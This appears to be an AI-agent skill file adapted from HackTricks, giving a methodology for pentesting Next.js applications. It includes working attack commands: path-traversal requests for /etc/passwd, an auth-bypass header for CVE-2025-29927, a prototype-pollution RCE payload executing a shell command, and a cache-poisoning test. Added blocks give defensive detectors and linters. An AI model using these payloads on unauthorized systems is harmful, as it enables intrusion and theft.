Hacktricks-skills nextjs-pentest

Pentest Next.js applications for security vulnerabilities. Use this skill whenever the user mentions Next.js security testing, Next.js pentesting, Next.js vulnerability assessment, React Server Components, Server Actions, middleware bypass, or any Next.js-related security concerns. This skill covers architecture analysis, client-side vulnerabilities, server-side issues, CVE exploitation, and automated reconnaissance.

install
source · Clone the upstream repo
git clone https://github.com/abelrguezr/hacktricks-skills
manifest: skills/network-services-pentesting/pentesting-web/nextjs/SKILL.MD
source content

Next.js Pentesting Skill

A comprehensive guide for security testing Next.js applications, covering architecture analysis, vulnerability discovery, and exploitation techniques.

Quick Start

When pentesting a Next.js application, follow this workflow:

  1. Reconnaissance - Identify Next.js version, architecture (App Router vs Pages Router), and exposed endpoints
  2. Static Analysis - Review configuration files, source maps, and build manifests
  3. Vulnerability Testing - Test for known CVEs, misconfigurations, and custom vulnerabilities
  4. Server Actions - Enumerate and test Server Actions for authorization issues
  5. RSC Testing - Check for React Server Components vulnerabilities

Phase 1: Reconnaissance

Identify Next.js Version and Architecture

# Check for Next.js fingerprints
# App Router: /_next/static/chunks/app/
# Pages Router: /_next/static/chunks/pages/

# Look for buildId in HTML (the Pages Router embeds it in the __NEXT_DATA__ blob)
buildId=$(curl -s http://target/ | grep -oE '"buildId":"[^"]+"' | cut -d: -f2 | tr -d '"')

# Check for App Router vs Pages Router by the chunk path the HTML references
curl -s http://target/ | grep -q '_next/static/chunks/app/' && echo "App Router detected" || echo "Pages Router detected"

Static Export Route Discovery

When nextExport / autoExport are true, Next.js exposes the build manifest:

# Extract buildId and enumerate all routes listed in the build manifest
buildId=$(curl -s http://target/ | grep -oE '"buildId":"[^"]+"' | cut -d: -f2 | tr -d '"')
# Route keys and sortedPages entries are quoted strings starting with "/"
curl -s "http://target/_next/static/${buildId}/_buildManifest.js" | grep -oE '"/[^"]*"' | tr -d '"' | sort -u

Use this for:

  • Auth testing on discovered endpoints
  • Finding hidden admin panels
  • Enumerating API routes

Server Artifacts to Target

If you find path traversal or download endpoints, target:

  • .env / .env.local - Session secrets, provider credentials
  • .next/routes-manifest.json - Complete route list
  • .next/build-manifest.json - Build configuration
  • .next/server/pages/api/auth/[...nextauth].js - NextAuth config (may contain fallback passwords)
  • next.config.js / next.config.mjs - Rewrites, redirects, middleware

Phase 2: Client-Side Vulnerabilities

Cross-Site Scripting (XSS)

Look for:

  • dangerouslySetInnerHTML with user input
  • Template injection in client components
  • Unsanitized URL parameters

Test:

// Vulnerable pattern to find
<div dangerouslySetInnerHTML={{ __html: userInput }} />

Client-Side Path Traversal (CSPT)

Look for:

  • File download endpoints accepting user-controlled paths
  • API routes that construct paths from input

Test:

# Try path traversal payloads
curl "http://target/api/files/../../../etc/passwd"
curl "http://target/api/files/..%2F..%2F..%2Fetc%2Fpasswd"

Phase 3: Server-Side Vulnerabilities

API Route Testing

App Router (Next.js 13+):

  • Routes: app/api/[path]/route.ts
  • Methods: exported GET, POST, PUT, DELETE functions

Pages Router (Next.js 12 and earlier):

  • Routes: pages/api/[path].js
  • Methods: single handler with method switching

Test all HTTP methods:

# Test each method on discovered API routes
for method in GET POST PUT DELETE PATCH OPTIONS; do
  curl -X $method http://target/api/endpoint
done

CORS Misconfiguration

Look for:

  • Access-Control-Allow-Origin: *
  • Overly permissive allowed origins
  • Missing Access-Control-Allow-Credentials restrictions

Test:

# Check CORS headers
curl -I -H "Origin: http://evil.com" http://target/api/endpoint

# Test with credentials
curl -I -H "Origin: http://evil.com" -H "Cookie: session=abc" http://target/api/endpoint

Middleware Authorization Bypass (CVE-2025-29927)

Affected versions: <12.3.5 / 13.5.9 / 14.2.25 / 15.2.3

Exploit:

# Inject x-middleware-subrequest header to bypass auth
curl -i "http://target/protected-page" \
  -H "x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware"

# For authenticated pages with many subresources, add header to all requests
# Use Burp Match/Replace with empty match string

Detection:

  • Baseline: 307 redirect to /api/auth/signin
  • Exploited: 200 OK with protected content
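Defender-side handling of the x-middleware-subrequest marker, as an added example that is not part of the skill or its bundled scripts: the header is set internally by Next.js and never by a browser, so a proxy in front of the app can strip it and log its presence. The JSON-lines log format, field names and sample records are assumptions.

```javascript
// Added example, not part of the skill: defender-side handling of the
// x-middleware-subrequest header abused by CVE-2025-29927. The header is an
// internal Next.js marker that a browser never sets, so an edge proxy or WAF
// in front of the app can drop it before forwarding and record the attempt.
// Log records below are constructed JSON lines, one request per line.
const BYPASS_HEADER = "x-middleware-subrequest";

// Look the header up case-insensitively. Returns null when it is absent.
function findBypassHeader(headers) {
  for (const [name, value] of Object.entries(headers)) {
    if (name.toLowerCase() === BYPASS_HEADER) return String(value);
  }
  return null;
}

// Copy of the headers without the internal marker, for the proxy to forward.
function stripBypassHeader(headers) {
  const clean = {};
  for (const [name, value] of Object.entries(headers)) {
    if (name.toLowerCase() !== BYPASS_HEADER) clean[name] = value;
  }
  return clean;
}

// Scan access-log lines. Any external request carrying the header is a
// finding; one answered 200 on a path whose baseline is a 307 to the
// sign-in page means protected content was actually served.
function scanAccessLog(lines) {
  const findings = [];
  for (const line of lines) {
    const rec = JSON.parse(line);
    const value = findBypassHeader(rec.headers || {});
    if (value === null) continue;
    findings.push({
      ts: rec.ts, path: rec.path, status: rec.status,
      header: value, servedContent: rec.status === 200,
    });
  }
  return findings;
}

const SAMPLE_LOG = [
  '{"ts":"2025-03-22T10:00:00Z","path":"/protected-page","status":307,"headers":{"user-agent":"curl/8.5"}}',
  '{"ts":"2025-03-22T10:00:05Z","path":"/protected-page","status":200,"headers":{"User-Agent":"curl/8.5","X-Middleware-Subrequest":"middleware:middleware:middleware:middleware:middleware"}}',
  '{"ts":"2025-03-22T10:00:09Z","path":"/","status":200,"headers":{"user-agent":"Mozilla/5.0"}}',
];
```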

Phase 4: Server Actions Enumeration

Hash-to-Function Mapping

Modern Next.js Server Actions use opaque hashes. When productionBrowserSourceMaps is enabled, you can map hashes to function names.

Extraction:

# Download the JS chunks the page references and search for createServerReference
# (chunk names are hashed per build, so take the src list from the HTML)
curl -s http://target/ | grep -oE '/_next/static/chunks/[^"]+\.js' | sort -u | while read -r chunk; do
  curl -s "http://target${chunk}" | \
    grep -oP 'createServerReference[^"]*"([a-f0-9]{40,})"[^"]*"([^"]+)"'
done

# Pattern 1: Strict - matches the minified call shape
#   (0,n.createServerReference)("<hash>",n.callServer,void 0,n.findSourceMapURL,"<symbol>")
createServerReference\)\("([a-f0-9]{40,})",\w+\.callServer,void 0,\w+\.findSourceMapURL,"([^"]+)"

# Pattern 2: Flexible
createServerReference[^"]*"([a-f0-9]{40,})"[^"]*"([^"]+)"

  • Group 1: Server Action hash
  • Group 2: Symbol/path to resolve via source map

Testing Server Actions

# Capture a valid POST with Next-Action header
# Then swap the hash to test other actions

curl -X POST http://target/ \
  -H "Next-Action: <target-hash>" \
  -H "Content-Type: application/json" \
  -d '{"args":[]}'

Look for actions like:

  • deleteUserAccount()
  • transferFunds()
  • exportFinancialData()
  • updateSettings()
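The hash-to-function mapping above and the "actions to look for" list, combined into one inventory routine as an added example that is not part of the skill or its scripts: it walks the createServerReference calls in a chunk, maps each hash to the symbol string the bundle carries next to it (absent when productionBrowserSourceMaps is off, so the hash stays opaque), and flags names that suggest state-changing actions. SAMPLE_CHUNK and the keyword list are constructed assumptions.

```javascript
// Added example, not part of the skill: inventory the Server Actions a client
// chunk exposes. Each call in a minified chunk looks like
//   (0,n.createServerReference)("<hash>",n.callServer,void 0,n.findSourceMapURL,"<symbol>")
// and, without productionBrowserSourceMaps, the trailing symbol is absent,
// so a hash can map to nothing. SAMPLE_CHUNK is constructed.
const HASH_AT_START = /^"([a-f0-9]{40,})"/;
const SENSITIVE_WORDS = ["delete", "transfer", "export", "admin", "payment"];

// Map every Server Action hash in a chunk to its symbol string, or null.
function extractServerActions(source) {
  const actions = new Map();
  for (const frag of source.split("createServerReference").slice(1)) {
    const q = frag.indexOf('"');
    if (q < 0) continue;
    const hash = HASH_AT_START.exec(frag.slice(q));
    if (!hash) continue;
    // Only look for the symbol inside this call's own argument list, so a
    // call without a symbol does not steal the next call's hash string.
    const rest = frag.slice(q + hash[0].length);
    const end = rest.indexOf(")");
    const args = end < 0 ? rest : rest.slice(0, end);
    const symbol = /"([^"]+)"/.exec(args);
    actions.set(hash[1], symbol ? symbol[1] : null);
  }
  return actions;
}

// Symbols whose name suggests a state-changing or data-exporting action.
function sensitiveActions(actions) {
  const out = [];
  for (const [hash, symbol] of actions) {
    if (symbol && SENSITIVE_WORDS.some((w) => symbol.toLowerCase().includes(w))) {
      out.push({ hash, symbol });
    }
  }
  return out;
}

const SAMPLE_CHUNK =
  '(0,n.createServerReference)("7a1b2c3d4e5f60718293a4b5c6d7e8f9a0b1c2d3",n.callServer,void 0,n.findSourceMapURL,"deleteUserAccount");' +
  '(0,n.createServerReference)("e3b0c44298fc1c149afbf4c8996fb92427ae41e4",n.callServer);' +
  '(0,n.createServerReference)("0123456789abcdef0123456789abcdef01234567",n.callServer,void 0,n.findSourceMapURL,"updateSettings")';
```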

Phase 5: React Server Components (RSC) Testing

CVE-2025-55182 - Flight Protocol RCE

Affected: react-server-dom-webpack 19.0.0–19.2.0 (Next.js 15.x/16.x)

Detection (safe mode):

# Use react2shell-scanner
python3 scanner.py -u https://target.tld --path /app/api/submit --safe-check

# Vulnerable: HTTP 500 with E{"digest" in body
# Patched: HTTP 200/400

Payload structure:

{
  "then": "$1:__proto__:then",
  "status": "resolved_model",
  "reason": -1,
  "value": "{\"then\":\"$B1337\"}",
  "_response": {
    "_prefix": "require('child_process').exec('id')",
    "_chunks": "$Q2",
    "_formData": { "get": "$1:constructor:constructor" }
  }
}

CVE-2025-55184/67779/55183 - RSC DoS & Source Disclosure

Detection:

# Send malformed Flight payload
curl -X POST http://target/ \
  -H "Content-Type: text/x-component" \
  -d '{"$": "malformed"}'

# Vulnerable: HTTP 500 with E{"digest"
# Patched: HTTP 400/200

CVE-2025-49005 - Cache Poisoning

Affected: App Router 15.3.0–15.3.2

Test:

# Prime CDN with RSC response
curl -k -H "Accept: text/x-component" "https://target/app/dashboard" > /dev/null

# Fetch without Accept header (victim view)
curl -k "https://target/app/dashboard" | head

# If response is JSON Flight data instead of HTML, cache is poisonable

Phase 6: Configuration Analysis

next.config.js Security Issues

Check for:

  1. Image optimization misconfiguration:
// Vulnerable - a "**" hostname lets /_next/image fetch and resize images from any origin
images: { remotePatterns: [{ protocol: "https", hostname: "**" }] }

// Safe - pin the exact hosts images are served from
images: { remotePatterns: [{ protocol: "https", hostname: "trusted-domain.com" }] }
  2. Environment variable exposure:
// Vulnerable - exposes to client; every key under env is inlined into the
// browser bundle, with or without the NEXT_PUBLIC_ prefix
env: { NEXT_PUBLIC_SECRET_KEY: process.env.SECRET_KEY }

// Safe - keep secrets out of next.config.js altogether; read
// process.env.SECRET_KEY only in server code (Route Handlers, Server
// Components, Server Actions) and put only public values under env
env: { NEXT_PUBLIC_APP_NAME: process.env.APP_NAME }
  3. Open redirects (redirects() in next.config.js takes destination strings, not functions, so this bug lives in middleware or Route Handler code):
// Vulnerable - redirect target taken verbatim from the query string
import { NextResponse } from "next/server";
export function middleware(req) {
  const url = req.nextUrl.searchParams.get("url");
  if (url) return NextResponse.redirect(url);
  return NextResponse.next();
}

// Safe - accept only same-origin paths; "//" and "/\" are rejected because
// browsers treat both as protocol-relative URLs
export function middleware(req) {
  const url = req.nextUrl.searchParams.get("url");
  if (url && /^\/(?![\/\\])/.test(url)) return NextResponse.redirect(new URL(url, req.url));
  return NextResponse.next();
}
  4. Security headers:
// Recommended
headers() {
  return [{
    source: "/(.*)",
    headers: [
      { key: "X-Frame-Options", value: "DENY" },
      { key: "Content-Security-Policy", value: "default-src 'self'" },
      { key: "X-Content-Type-Options", value: "nosniff" },
      { key: "Strict-Transport-Security", value: "max-age=63072000; includeSubDomains" }
    ]
  }]
}
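The four next.config.js checks above as one linter, an added example that is not part of the skill or its scripts: it takes the loaded config object and reports wildcard image hosts, non-public env keys (which are inlined into the client bundle) and security headers missing from the catch-all rule. The finding identifiers and both sample configs are constructed assumptions.

```javascript
// Added example, not part of the skill: a linter for the next.config.js issues
// above. It takes the loaded config object; in a real run, require() the file
// and await headers() first, since it may return a Promise. Both sample
// configs below are constructed.
const REQUIRED_HEADERS = ["X-Frame-Options", "Content-Security-Policy", "X-Content-Type-Options", "Strict-Transport-Security"];

function auditNextConfig(config) {
  const findings = [];
  // 1. Image optimizer open to every origin ("**" matches any hostname).
  for (const p of (config.images && config.images.remotePatterns) || []) {
    if (p.hostname === "**" || p.hostname === "*") findings.push("images-wildcard-host");
  }
  // 2. Every env value is inlined into the client bundle; anything not
  //    deliberately public (NEXT_PUBLIC_) is a leak.
  for (const key of Object.keys(config.env || {})) {
    if (!key.startsWith("NEXT_PUBLIC_")) findings.push("env-inlined:" + key);
  }
  // 3. Security headers missing from the catch-all headers() rule.
  const rules = typeof config.headers === "function" ? config.headers() : config.headers || [];
  const catchAll = rules.find((r) => r.source === "/(.*)" || r.source === "/:path*");
  const present = new Set((catchAll ? catchAll.headers : []).map((h) => h.key));
  for (const name of REQUIRED_HEADERS) {
    if (!present.has(name)) findings.push("missing-header:" + name);
  }
  return findings;
}

const VULNERABLE_CONFIG = {
  images: { remotePatterns: [{ protocol: "https", hostname: "**" }] },
  env: { SECRET_KEY: "constructed-placeholder", NEXT_PUBLIC_APP_NAME: "demo" },
  headers() {
    return [{ source: "/(.*)", headers: [{ key: "X-Frame-Options", value: "DENY" }] }];
  },
};

const SAFE_CONFIG = {
  images: { remotePatterns: [{ protocol: "https", hostname: "trusted-domain.com" }] },
  env: { NEXT_PUBLIC_APP_NAME: "demo" },
  headers() {
    return [{ source: "/(.*)", headers: REQUIRED_HEADERS.map((key) => ({ key, value: "set" })) }];
  },
};
```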

Middleware Analysis

Location: middleware.ts / middleware.js in the project root or src/

Check for:

  • Authorization logic that can be bypassed
  • Header manipulation vulnerabilities
  • Redirect logic with user input

Scripts

Use the bundled scripts for automated tasks:

  • scripts/extract-build-manifest.sh - Extract routes from build manifest
  • scripts/enumerate-server-actions.sh - Map Server Action hashes to function names
  • scripts/test-middleware-bypass.sh - Test CVE-2025-29927
  • scripts/check-rsc-vulnerabilities.sh - Check for RSC CVEs

Reporting

When documenting findings:

  1. Include version information - Next.js version, React version, affected packages
  2. Provide reproduction steps - Exact requests and responses
  3. Reference CVEs - When applicable, include CVE numbers
  4. Suggest mitigations - Patch versions, configuration changes
